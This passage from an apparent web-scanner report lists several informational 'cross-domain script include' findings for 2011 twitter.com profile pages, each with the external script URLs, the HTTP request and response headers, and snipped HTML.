<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.557. http://twitter.com/townsandtrails previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/townsandtrails

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /townsandtrails HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:10:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234653-20665-42642
ETag: "a362469ed7aa0642e1eaeba7a678e470"
Last-Modified: Fri, 28 Jan 2011 17:10:53 GMT
X-Runtime: 0.01095
Content-Type: text/html; charset=utf-8
Content-Length: 50543
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.558. http://twitter.com/townsandtrails previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/townsandtrails

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /townsandtrails HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:28 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225028-55890-31920
ETag: "8cefd1f1479aaa09aab96f1e9191b50f"
Last-Modified: Fri, 28 Jan 2011 14:30:28 GMT
X-Runtime: 0.01466
Content-Type: text/html; charset=utf-8
Content-Length: 50670
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.559. http://twitter.com/travis previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/travis

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /travis HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:35 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225035-81767-49969
ETag: "87ddebc7da76c7d19a026c1d7f912c12"
Last-Modified: Fri, 28 Jan 2011 14:30:35 GMT
X-Runtime: 0.01393
Content-Type: text/html; charset=utf-8
Content-Length: 56939
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.560. http://twitter.com/travis previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/travis

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /travis HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:11:08 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234668-30470-49371
ETag: "74f171d96b56e235d5f332cd7e461a2e"
Last-Modified: Fri, 28 Jan 2011 17:11:08 GMT
X-Runtime: 0.00791
Content-Type: text/html; charset=utf-8
Content-Length: 56213
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.561. http://twitter.com/tylerseguin92 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/tylerseguin92

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296261409
http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296261409
http://a1.twimg.com/a/1296258363/javascripts/api.js?1296261409
http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261409
http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261409
http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261409
http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296261409
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:56 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266036-23768-37977
ETag: "259dab0c6ed9a5201ee9cf6df844e230"
Last-Modified: Sat, 29 Jan 2011 01:53:56 GMT
X-Runtime: 0.01340
Content-Type: text/html; charset=utf-8
Content-Length: 21949
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296261409" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261409" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261409" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261409" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296261409" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/api.js?1296261409" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261409" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296261409" type="text/javascript"></script>
...[SNIP]...

18.562. http://twitter.com/waynecountylife previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/waynecountylife

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /waynecountylife HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225036-43124-3354
ETag: "04a252192aa79528cad7c5c11d3825f3"
Last-Modified: Fri, 28 Jan 2011 14:30:36 GMT
X-Runtime: 0.35094
Content-Type: text/html; charset=utf-8
Content-Length: 54878
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIidodHRwOi8vdHdpdHRlci5jb20vd2F5bmVjb3Vu%250AdHlsaWZlOgxjc3JmX2lkIiUyZDVjNDY0MjVjZjk4MWU0NDI1ZGZkZWI1OTNl%250ANDIxYzoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--90d7bcbfc68d4b17546f6b6e6696899149d482a7; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.563. http://twitter.com/waynecountylife previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/waynecountylife

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /waynecountylife HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:11:08 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234668-81806-6620
ETag: "8574d4b4cfe431ac93d89a236e8e4999"
Last-Modified: Fri, 28 Jan 2011 17:11:08 GMT
X-Runtime: 0.01081
Content-Type: text/html; charset=utf-8
Content-Length: 54757
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
